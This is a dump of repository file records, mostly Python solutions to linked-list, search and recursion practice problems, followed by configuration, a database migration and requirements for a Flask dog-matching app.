"text": "\"\"\"\r\n\r\nReverse a linked list\r\n\r\n1287.43 more points to get your next star!\r\nRank: 114764|Points: 912.57/2200\r\nProblem Solving\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nEditorial\r\nThis challenge is part of a tutorial track by MyCodeSchool and is accompanied by a video lesson.\r\n\r\nYou’re given the pointer to the head node of a linked list. Change the next pointers of the nodes so that their order is reversed. The head pointer given may be null meaning that the initial list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the SinglyLinkedListNode reverse(SinglyLinkedListNode head) method which takes one argument - the head of the linked list. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows:\r\n\r\nThe first line contains an integer , denoting the number of test cases.\r\nEach test case is of the following format:\r\n\r\nThe first line contains an integer , denoting the number of elements in the linked list.\r\nThe next lines contain an integer each, denoting the elements of the linked list.\r\n\r\nConstraints\r\n\r\n, where is the element in the list.\r\nOutput Format\r\n\r\nChange the next pointers of the nodes that their order is reversed and return the head of the reversed linked list. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the code in the editor. The output format is as follows:\r\n\r\nFor each test case, print in a new line the elements of the linked list after reversing it, separated by spaces.\r\n\r\nSample Input\r\n\r\n1\r\n5\r\n1\r\n2\r\n3\r\n4\r\n5\r\nSample Output\r\n\r\n5 4 3 2 1 \r\nExplanation\r\n\r\nThe initial linked list is: 1 -> 2 -> 3 -> 4 -> 5 -> NULL\r\n\r\nThe reversed linked list is: 5 -> 4 -> 3 -> 2 -> 1 -> NULL\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the reverse function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef reverse(head):\r\n h2 = None\r\n while(head != None):\r\n x = SinglyLinkedListNode(head.data)\r\n x = head\r\n head = head.next\r\n x.next = h2\r\n h2 = x\r\n return h2\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n tests = int(input())\r\n\r\n for tests_itr in range(tests):\r\n llist_count = int(input())\r\n\r\n llist = SinglyLinkedList()\r\n\r\n for _ in range(llist_count):\r\n llist_item = int(input())\r\n llist.insert_node(llist_item)\r\n\r\n llist1 = reverse(llist.head)\r\n\r\n print_singly_linked_list(llist1, ' ', fptr)\r\n fptr.write('\\n')\r\n\r\n fptr.close()\r\n"
},
{
"alpha_fraction": 0.6503428220748901,
"alphanum_fraction": 0.6640548706054688,
"avg_line_length": 22.503999710083008,
"blob_id": "701534d196d026d8ed9fa05967f6dd51e190504b",
"content_id": "7d9d9f3c0decacad20b2f2f1a9daca397ec3f6d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3063,
"license_type": "no_license",
"max_line_length": 279,
"num_lines": 125,
"path": "/Delete duplicate-value nodes from a sorted linked list.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nDelete duplicate-value nodes from a sorted linked list\r\n1262.43 more points to get your next star!\r\nRank: 110100|Points: 937.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nThis challenge is part of a tutorial track by MyCodeSchool\r\n\r\nYou're given the pointer to the head node of a sorted linked list, where the data in the nodes is in ascending order. Delete as few nodes as possible so that the list does not contain any value more than once. The given head pointer may be null indicating that the list is empty.\r\n\r\nInput Format\r\n\r\nYou have to complete the SinglyLinkedListNode* removeDuplicates(SinglyLinkedListNode* head) method which takes one argument - the head of the sorted linked list. You should NOT read any input from stdin/console.\r\n\r\nThe input is handled by the code in the editor and the format is as follows:\r\n\r\nThe first line contains an integer\r\n\r\n, denoting the number of test cases. The format for each test case is as follows:\r\n\r\nThe first line contains an integer\r\n, denoting the number of elements in the linked list.\r\nThe next\r\n\r\nlines contain an integer each, denoting the elements of the linked list.\r\n\r\nConstraints\r\n\r\nOutput Format\r\n\r\nDelete as few nodes as possible to ensure that no two nodes have the same data. Adjust the next pointers to ensure that the remaining nodes form a single sorted linked list. Then return the head of the sorted updated linked list. Do NOT print anything to stdout/console.\r\n\r\nThe output is handled by the code in the editor and the format is as follows: For each test case, print in a new line, the data of the linked list after removing the duplicates separated by space.\r\n\r\nSample Input\r\n\r\n1\r\n5\r\n1\r\n2\r\n2\r\n3\r\n4\r\n\r\nSample Output\r\n\r\n1 2 3 4 \r\n\r\nExplanation\r\n\r\nThe initial linked list is: 1 -> 2 -> 2 -> 3 -> 4 -> NULL\r\n\r\nThe final linked list is: 1 -> 2 -> 3 -> 4 -> NULL\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\nclass SinglyLinkedListNode:\r\n def __init__(self, node_data):\r\n self.data = node_data\r\n self.next = None\r\n\r\nclass SinglyLinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n\r\n def insert_node(self, node_data):\r\n node = SinglyLinkedListNode(node_data)\r\n\r\n if not self.head:\r\n self.head = node\r\n else:\r\n self.tail.next = node\r\n\r\n\r\n self.tail = node\r\n\r\ndef print_singly_linked_list(node, sep, fptr):\r\n while node:\r\n fptr.write(str(node.data))\r\n\r\n node = node.next\r\n\r\n if node:\r\n fptr.write(sep)\r\n\r\n# Complete the removeDuplicates function below.\r\n\r\n#\r\n# For your reference:\r\n#\r\n# SinglyLinkedListNode:\r\n# int data\r\n# SinglyLinkedListNode next\r\n#\r\n#\r\ndef removeDuplicates(head):\r\n if(head == None):\r\n return head\r\n t = head\r\n while(t.next != None):\r\n if(t.data == t.next.data):\r\n t.next = t.next.next\r\n else:\r\n t = t.next\r\n return head\r\n\r\nif __name__ == '__main__':\r\n"
},
{
"alpha_fraction": 0.547863245010376,
"alphanum_fraction": 0.5564102530479431,
"avg_line_length": 22.212766647338867,
"blob_id": "bbdf6d8bece8ebaeb982274952f94651b6b5de6e",
"content_id": "ff918de22ede72411d0ebb1ae3d78484eddb5556",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 47,
"path": "/Palindrome List Linked List.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nPalindrome List\r\n\r\n Asked in: \r\n Amazon\r\n Microsoft\r\n\r\nGiven a singly linked list, determine if its a palindrome. Return 1 or 0 denoting if its a palindrome or not, respectively.\r\n\r\nNotes:\r\n\r\n Expected solution is linear in time and constant in space.\r\n\r\nFor example,\r\n\r\nList 1-->2-->1 is a palindrome.\r\nList 1-->2-->3 is not a palindrome.\r\n\r\n NOTE: You only need to implement the given function. Do not read input, instead use the arguments to the function. Do not print the output, instead return values as specified.\r\n Still have a doubt? Checkout Sample Codes for more details. \r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return an integer\r\n def lPalin(self, A):\r\n st = []\r\n temp = A\r\n while(A != None):\r\n st.append(A.val)\r\n A = A.next\r\n A = temp\r\n while(A != None):\r\n if(st.pop() != A.val):\r\n return 0\r\n A = A.next\r\n return 1\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.5305343270301819,
"alphanum_fraction": 0.5338740348815918,
"avg_line_length": 22.36046600341797,
"blob_id": "1a9928c70b2dd9076aacf217fb1726d11b62551e",
"content_id": "09cacf0b2a6e53cc4d2f46768d5bb26360cbd101",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2096,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 86,
"path": "/Insertion Sort List LINKED LISTS.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nInsertion Sort List\r\n\r\n Asked in: \r\n Microsoft\r\n Google\r\n\r\nSort a linked list using insertion sort.\r\n\r\nWe have explained Insertion Sort at Slide 7 of Arrays\r\n\r\nInsertion Sort Wiki has some details on Insertion Sort as well.\r\n\r\nExample :\r\n\r\nInput : 1 -> 3 -> 2\r\n\r\nReturn 1 -> 2 -> 3\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return the head node in the linked list\r\n \r\n def insertionSortList(self, head_ref): \r\n \r\n # Initialize sorted linked list \r\n sorted = None\r\n \r\n # Traverse the given linked list and insert every \r\n # node to sorted \r\n current = head_ref \r\n while (current != None): \r\n \r\n # Store next for next iteration \r\n next = current.next\r\n \r\n # insert current in sorted linked list \r\n sorted = self.sortedInsert( sorted, current) \r\n \r\n # Update current \r\n current = next\r\n \r\n # Update head_ref to point to sorted linked list \r\n head_ref = sorted\r\n return head_ref \r\n \r\n# function to insert a new_node in a list. Note that this \r\n# function expects a pointer to head_ref as this can modify the \r\n# head of the input linked list (similar to push()) \r\n def sortedInsert(self, head_ref, new_node): \r\n \r\n current = None\r\n \r\n # Special case for the head end */ \r\n if (head_ref == None or (head_ref).val >= new_node.val): \r\n \r\n new_node.next = head_ref \r\n head_ref = new_node \r\n \r\n else: \r\n \r\n # Locate the node before the point of insertion \r\n current = head_ref \r\n while (current.next != None and\r\n current.next.val < new_node.val): \r\n \r\n current = current.next\r\n \r\n new_node.next = current.next\r\n current.next = new_node \r\n \r\n return head_ref \r\n"
},
{
"alpha_fraction": 0.4434550404548645,
"alphanum_fraction": 0.4964381158351898,
"avg_line_length": 17.701753616333008,
"blob_id": "b9a4347994e32382dae47ed0e003be1fed21ad1b",
"content_id": "2beb30c13aaf111d907e0ceb3a6dad2faaf84a05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2246,
"license_type": "no_license",
"max_line_length": 275,
"num_lines": 114,
"path": "/find frequency.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nFinding the Floor\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array, you have to find the floor of a number x. The floor of a number x is nothing but the largest number in the array less than or equal to x.\r\n\r\nInput Format\r\n\r\nFirst line of input contains N - size of the array. The next line contains N integers, the elements of the array. The next line contains Q - number of queries. Each of the next Q lines contains a single integer X, for which you have to find the floor of X in the given array.\r\n\r\nConstraints\r\n\r\n30 points\r\n1 <= N <= 105\r\n1 <= Q <= 102\r\n-108 <= ar[i] <= 108\r\n\r\n70 points\r\n1 <= N <= 105\r\n1 <= Q <= 105\r\n-108 <= ar[i] <= 108\r\n\r\nOutput Format\r\n\r\nFor each query, print the floor of X, separated by newline. If floor not found, print the value of \"INT_MIN\"\r\n\r\nSample Input 0\r\n\r\n6\r\n-6 10 -1 20 15 5 \r\n5\r\n-1\r\n10\r\n8\r\n-10\r\n-4\r\n\r\nSample Output 0\r\n\r\n-1\r\n10\r\n5\r\n-2147483648\r\n-6\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\ndef findfloor(ar, l, h, c,ans):\r\n m = (l+h)//2\r\n while(l<=h):\r\n if(ar[m]==c):\r\n ans = ar[m]\r\n return ans \r\n if(ar[m]>c):\r\n return findfloor(ar, l, m-1, c, ans )\r\n if(ar[m]<c):\r\n ans = ar[m]\r\n return findfloor(ar, m+1, h, c, ans )\r\n return ans \r\n return ans \r\n \r\ndef merges(ar,l,h):\r\n if(l==h):\r\n return\r\n mid=(l+h)//2\r\n merges(ar,l,mid)\r\n merges(ar,mid+1,h)\r\n merge(ar,l,mid,h)\r\n \r\ndef merge(ar,l,mid,h):\r\n p1 = l\r\n p2 = mid+1\r\n k = 0\r\n size = h-l+1\r\n temp = [0]*size\r\n while((p1<=mid) and (p2<=h)):\r\n if(ar[p1]>ar[p2]):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n else:\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p1<=mid):\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p2<=h):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n for i in range(l,h+1):\r\n ar[i] = temp[i-l] \r\n\r\n\r\nn = int(input())\r\nar = list(map(int, input().split()))\r\nmerges(ar, 0, n-1)\r\nquer = int(input())\r\nans = -2147483648\r\nfor q in range(quer):\r\n c = int(input())\r\n val = findfloor(ar, 0, n-1, c,ans)\r\n print(val)\r\n"
},
{
"alpha_fraction": 0.4676056206226349,
"alphanum_fraction": 0.4816901385784149,
"avg_line_length": 21.933332443237305,
"blob_id": "9cb0e4a3d801aa52846f075a86a889fea1716bd8",
"content_id": "036276000ccdf63fb4d26510a567d3502280a9d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 355,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 15,
"path": "/recursion/toh_easy.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": " def toh(n,src, dest, temp):\n if(n==0):\n return\n toh(n-1, src, temp, dest )\n print(\"Move {} from {} to {}\".format(n, src, dest))\n toh(n-1, temp, dest, src)\n\n\nfor _ in range(int(input())):\n n = int(input())\n src = \"A\"\n dest = \"C\"\n temp = \"B\"\n print(2**n-1) # no.of shifts required \n toh(n,src, dest, temp)\n \n \n"
}
] | 39 |
edwin-19/Backbone-Scratch | https://github.com/edwin-19/Backbone-Scratch | aef8cbc362eefd2ae253a8dcfc70aa917419efb1 | 7a7eb0c186b2f20aa2c46b685527af60a1d05151 | bcfd51ed4eed600252964f48c05d0249d1ffba93 | refs/heads/master | 2023-03-08T09:59:39.886941 | 2021-02-25T16:03:11 | 2021-02-25T16:03:11 | 340,708,286 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7197452187538147,
"alphanum_fraction": 0.7770700454711914,
"avg_line_length": 38.5,
"blob_id": "a147bc45345b8f0f24cb9022949b9f4b861ad2c8",
"content_id": "254ffada9c63170d26abddb3d3fd31b4fc8594bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 4,
"path": "/backbone/resnet.py",
"repo_name": "edwin-19/Backbone-Scratch",
"src_encoding": "UTF-8",
"text": "from backbone.blocks.resnet_block import conv_first_block, convolutional_block, identity_block\n\ndef ResNet50(input_shape=(224, 224, 3), activation):\n pass"
},
{
"alpha_fraction": 0.5453445911407471,
"alphanum_fraction": 0.5719467997550964,
"avg_line_length": 29.629629135131836,
"blob_id": "26278376df035c5fd72f0e27dc8f4cd8d668735c",
"content_id": "563f0be03c5ddbdffc3d4b3711ab503793d5a1ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 27,
"path": "/README.md",
"repo_name": "edwin-19/Backbone-Scratch",
"src_encoding": "UTF-8",
"text": "# Deep Learning Networks from scratch\nThe idea here is to understand and write each backbone network from scratch and replace them with more state of the art activation functions such as swish or mish.\n\n## Todo\nResnet:\n\n- [x] Resnet50\n- [x] Resnet101\n- [x] Resnet152\n\nMobile Net:\n\n- [ ] MobileNetV1\n- [ ] MobileNetV2\n\nUtitlities:\n- [ ] General purpose function for selecting activation functions\n- [ ] Create general purpose module for backbone\n- [ ] Pyfile for training, evaluation and demo\n\n\n## Comparison of Activation Functions\n| Activation Function | Matthews Correlation Coefficient |\n|---------------------|----------------------------------|\n| Relu | 96.09 |\n| Swish | 98.04 |\n| Mish | 98.24 | "
},
{
"alpha_fraction": 0.6091410517692566,
"alphanum_fraction": 0.6371158361434937,
"avg_line_length": 35.20000076293945,
"blob_id": "a39bd5c7178ddcb61c210ee6a2cb1cb816c2b541",
"content_id": "1e216ff7acbb23f7f0c96be6ee95d201ad348fc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2538,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 70,
"path": "/backbone/blocks/resnet_block.py",
"repo_name": "edwin-19/Backbone-Scratch",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\ndef identity_block(x, filters, kernel_size):\n f1, f2, f3 = filters\n \n x_shortcut = x\n \n # First block of identity\n x = tf.keras.layers.Conv2D(f1, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Second block of identity\n x = tf.keras.layers.Conv2D(f2, kernel_size=kernel_size, strides=(1, 1), padding='same')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Third block of identity \n x = tf.keras.layers.Conv2D(f3, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n \n # Skip Conncection\n x = tf.keras.layers.Add()([x, x_shortcut])\n \n # Activaton to fireoff the next layer\n x = tf.keras.layers.Activation('relu')(x)\n \n return x\n\ndef convolutional_block(x, filters, kernel_size, strides):\n f1, f2, f3 = filters\n \n x_shortcut = x\n \n # First block of convolutional block\n x = tf.keras.layers.Conv2D(f1, kernel_size=(1, 1), strides=strides)(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Second block of convolutional block\n x = tf.keras.layers.Conv2D(f2, kernel_size=kernel_size, strides=(1, 1), padding='same')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n \n # Third block of convolutional block\n x = tf.keras.layers.Conv2D(f3, kernel_size=(1, 1), strides=(1, 1), padding='valid')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n \n # Shortcut path\n x_shortcut = tf.keras.layers.Conv2D(f3, kernel_size=(1, 1), strides=strides, padding='valid')(x_shortcut)\n x_shortcut = tf.keras.layers.BatchNormalization(axis=3)(x_shortcut)\n \n # Skip connection\n x = tf.keras.layers.Add()([x, x_shortcut])\n \n # Fire off to the last layer\n x = tf.keras.layers.Activation('relu')(x)\n return x\n\ndef conv_first_block(input_shape=(224, 224, 3)):\n input_layer = tf.keras.layers.Input(input_shape)\n x = tf.keras.layers.ZeroPadding2D((3, 3))(input_layer)\n \n # Stage 1\n x = tf.keras.layers.Conv2D(64, kernel_size=(7, 7), strides=(2, 2))(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n x = tf.keras.layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n \n return x, input_layer\n "
}
] | 3 |
gabriel-andrian/pets-love | https://github.com/gabriel-andrian/pets-love | 4407c1df5809429355f5989c1a5a1e5f7b786c7f | 8261a75a508e0e7a92a7a390e329931f05289f07 | 97dfee8933ed1a2d7e1bcb850a775567a789cd36 | refs/heads/main | 2023-02-27T08:40:22.799450 | 2021-01-22T02:47:15 | 2021-01-22T02:47:15 | 335,694,022 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6722054481506348,
"alphanum_fraction": 0.7024168968200684,
"avg_line_length": 24.461538314819336,
"blob_id": "ee5a6598f03aef6c64e4494a66722c1370dfc4b4",
"content_id": "76fe2bde4fca57bc456ace92a293effdce8bdc6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 662,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 26,
"path": "/config.py",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "from environs import Env\n# from secrets import token_hex\n\nenv = Env()\nenv.read_env()\n\n\nclass Config:\n DEBUG = False\n TESTING = False\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n # JWT_SECRET_KEY = token_hex(16)\n # JWT_ACCESS_TOKEN_EXPIRES = False\n\n\nclass DevelopmentConfig(Config):\n DATABASE_URL = 'postgresql://postgres:12345678@localhost/capstone_q3'\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = 'postgresql://postgres:12345678@localhost/capstone_q3'\n\n\nclass ProductionConfig(Config):\n ENV = 'production'\n DATABASE_URL = env.str('DATABASE_URL')\n BREEDS_CSV = env.str('BREEDS_CSV')\n SQLALCHEMY_DATABASE_URI = env.str('DATABASE_URL')\n"
},
{
"alpha_fraction": 0.6393442749977112,
"alphanum_fraction": 0.6523224115371704,
"avg_line_length": 38.56756591796875,
"blob_id": "78e801339c7eb12f23f0994b7ffb517d432d2af9",
"content_id": "cfbdfa5bbce122441151580672a69b29744b0493",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4392,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 111,
"path": "/migrations/versions/3a1f06bc9c90_create_all_tables.py",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "\"\"\"create all tables\n\nRevision ID: 3a1f06bc9c90\nRevises: 5aa5bb13c991\nCreate Date: 2021-01-21 22:19:23.387898\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3a1f06bc9c90'\ndown_revision = '5aa5bb13c991'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('breed',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('conversation',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('time_started', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('owner',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('surname', sa.String(length=64), nullable=True),\n sa.Column('document', sa.String(length=20), nullable=False),\n sa.Column('email', sa.String(length=128), nullable=False),\n sa.Column('address', sa.String(length=128), nullable=False),\n sa.Column('password', sa.String(length=128), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('document'),\n sa.UniqueConstraint('email')\n )\n op.create_table('dog',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('details', sa.String(length=300), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.Column('breed_id', sa.Integer(), nullable=True),\n sa.Column('gender', sa.Boolean(), nullable=False),\n sa.ForeignKeyConstraint(['breed_id'], ['breed.id'], ),\n sa.ForeignKeyConstraint(['owner_id'], ['owner.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('dog_conversation',\n sa.Column('dog_id', sa.Integer(), nullable=True),\n sa.Column('conversation_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['conversation_id'], ['conversation.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['dog_id'], ['dog.id'], ondelete='CASCADE')\n )\n op.create_table('interest',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dog_id', sa.Integer(), nullable=False),\n sa.Column('breed_id', sa.Integer(), nullable=False),\n sa.Column('gender_interest', sa.Boolean(), nullable=False),\n sa.ForeignKeyConstraint(['breed_id'], ['breed.id'], ),\n sa.ForeignKeyConstraint(['dog_id'], ['dog.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('dog_id')\n )\n op.create_table('like',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dog_id_give', sa.Integer(), nullable=False),\n sa.Column('dog_id_receive', sa.Integer(), nullable=False),\n sa.Column('dislike', sa.Boolean(), nullable=False),\n sa.Column('match', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['dog_id_give'], ['dog.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['dog_id_receive'], ['dog.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('message',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('message', sa.Text(), nullable=False),\n sa.Column('ts', sa.DateTime(), nullable=True),\n sa.Column('dog_id', sa.Integer(), nullable=False),\n sa.Column('conversation_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['conversation_id'], ['conversation.id'], ),\n sa.ForeignKeyConstraint(['dog_id'], ['dog.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('photo',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('dog_account_id', sa.Integer(), nullable=True),\n sa.Column('link', sa.String(), nullable=False),\n sa.ForeignKeyConstraint(['dog_account_id'], ['dog.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('photo')\n op.drop_table('message')\n op.drop_table('like')\n op.drop_table('interest')\n op.drop_table('dog_conversation')\n op.drop_table('dog')\n op.drop_table('owner')\n op.drop_table('conversation')\n op.drop_table('breed')\n # ### end Alembic commands ###\n"
},
{
"alpha_fraction": 0.7766990065574646,
"alphanum_fraction": 0.791262149810791,
"avg_line_length": 22,
"blob_id": "9bc98565cda51ff6fe80b47c92a75abecb26589a",
"content_id": "c9f9141b3ee18ffa9bdab30ba3f05028fc85c4c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 206,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/.env.example",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "FLASK_ENV=development\n\nDATABASE_URL='postgresql://:@localhost/capstone_q3'\n\nSQLALCHEMY_DATABASE_URI = 'postgresql://:@localhost/capstone_q3'\n\nSQLALCHEMY_TRACK_MODIFICATIONS=0\n\nBREEDS_CSV=data/all_breeds.csv"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6974790096282959,
"avg_line_length": 16.414634704589844,
"blob_id": "cfe80bba42241228489775b401062b09124dda90",
"content_id": "ae05cf2352b2e859687f300c115c7d6bd0bae6e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 714,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 41,
"path": "/requirements.txt",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
"text": "alembic==1.4.3\nastroid==2.4.2\nattrs==20.3.0\nautopep8==1.5.4\nclick==7.1.2\nenvirons==9.3.0\nflake8==3.8.4\nFlask==1.1.2\nFlask-JWT-Extended==3.25.0\nflask-marshmallow==0.14.0\nFlask-Migrate==2.5.3\nFlask-SQLAlchemy==2.4.4\ngunicorn==20.0.4\niniconfig==1.1.1\nisort==5.7.0\nitsdangerous==1.1.0\nJinja2==2.11.2\nlazy-object-proxy==1.4.3\nMako==1.1.3\nMarkupSafe==1.1.1\nmarshmallow==3.10.0\nmarshmallow-sqlalchemy==0.24.1\nmccabe==0.6.1\npackaging==20.8\npluggy==0.13.1\npsycopg2-binary==2.8.6\npy==1.10.0\npycodestyle==2.6.0\npyflakes==2.2.0\nPyJWT==1.7.1\npylint==2.6.0\npyparsing==2.4.7\npytest==6.2.1\npython-dateutil==2.8.1\npython-dotenv==0.15.0\npython-editor==1.0.4\nsix==1.15.0\nSQLAlchemy==1.3.22\ntoml==0.10.2\nWerkzeug==1.0.1\nwrapt==1.12.1\n"
},
{
"alpha_fraction": 0.7369901537895203,
"alphanum_fraction": 0.7383966445922852,
"avg_line_length": 27.440000534057617,
"blob_id": "b3bb9a1ddeee8cfa26a50ae7c520b3d9e48dafb3",
"content_id": "badb12cbb212a38d259a475329a4c1eefb798bfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1422,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 50,
"path": "/app/__init__.py",
"repo_name": "gabriel-andrian/pets-love",
"src_encoding": "UTF-8",
